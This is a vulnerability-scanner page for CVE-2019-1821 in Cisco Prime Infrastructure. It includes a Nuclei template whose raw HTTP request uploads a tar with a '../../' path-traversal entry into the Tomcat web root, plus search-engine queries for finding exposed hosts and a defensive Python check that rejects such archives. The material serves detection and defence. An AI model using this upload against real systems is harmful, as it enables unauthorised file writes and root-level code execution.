Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
ID: CVE-2019-1821
Severity: critical
Author: _0xf4n9x_
Tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco
Description
Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exists because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
YAML Source
id: CVE-2019-1821

info:
  name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
  author: _0xf4n9x_
  severity: critical
  description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
  remediation: |
    Apply the latest security patches provided by Cisco to mitigate this vulnerability.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce
    - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1821
    - http://packetstormsecurity.com/files/153350/Cisco-Prime-Infrastructure-Health-Monitor-TarArchive-Directory-Traversal.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-1821
    cwe-id: CWE-20
    epss-score: 0.96792
    epss-percentile: 0.99681
    cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: cisco
    product: evolved_programmable_network_manager
    shodan-query: http.title:"prime infrastructure"
    fofa-query: title="prime infrastructure"
    google-query: intitle:"prime infrastructure"
  tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco

http:
  - raw:
      - |
        POST /servlet/UploadServlet HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Primary-IP: 127.0.0.1
        Filename: test.tar
        Filesize: 10240
        Compressed-Archive: false
        Destination-Dir: tftpRoot
        Filecount: 1
        Content-Length: 269
        Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83

        --871a4a346a547cf05cb83f57b9ebcb83
        Content-Disposition: form-data; name="files"; filename="test.tar"

        ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}}
        --871a4a346a547cf05cb83f57b9ebcb83--
      - |
        GET /test.txt HTTP/1.1
        Host: {{Host}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains((body_2), '{{randstr}}')"
        condition: and
# digest: 4b0a00483046022100bf6156349e1669bcb98a5abd2d89fbb3e48a731b8f063371af17dffb63821c7d022100bdd98242390649fc02d50c211b479135c67b5ba689b4bb077612f8b2afde21a9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-1821.yaml"
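
The tar entry name in the template starts with `../../`, so the file is written outside the upload destination and into the web root. A server-side check that rejects such an archive before extraction, given here as an added example (not part of the template or of Cisco's fix); the destination path `/srv/tftpRoot`, the function names and the sample archive are assumptions constructed for illustration:

```python
import io
import posixpath
import tarfile


def build_tar(entries):
    """Build an in-memory tar from {name: bytes}. Constructed sample input only."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def unsafe_members(tar_bytes, dest_dir):
    """Return the entry names that must not be extracted under dest_dir."""
    dest = posixpath.normpath(dest_dir)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for member in tar.getmembers():
            # Resolve the name the way the extractor would, collapsing "..".
            target = posixpath.normpath(posixpath.join(dest, member.name))
            # Compare with a trailing separator so "/srv/tftpRootX" does not
            # pass as being inside "/srv/tftpRoot".
            inside = target == dest or target.startswith(dest + "/")
            # Links and device nodes can redirect later writes; refuse them.
            regular = member.isfile() or member.isdir()
            if not inside or not regular:
                bad.append(member.name)
    return bad


if __name__ == "__main__":
    sample = build_tar({
        "configs/router1.cfg": b"hostname r1\n",  # benign entry
        "../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt": b"x",  # name from the template
    })
    rejected = unsafe_members(sample, "/srv/tftpRoot")
    print("reject upload" if rejected else "ok", rejected)
```

An upload handler would refuse the whole archive when the returned list is non-empty instead of skipping only the flagged entries.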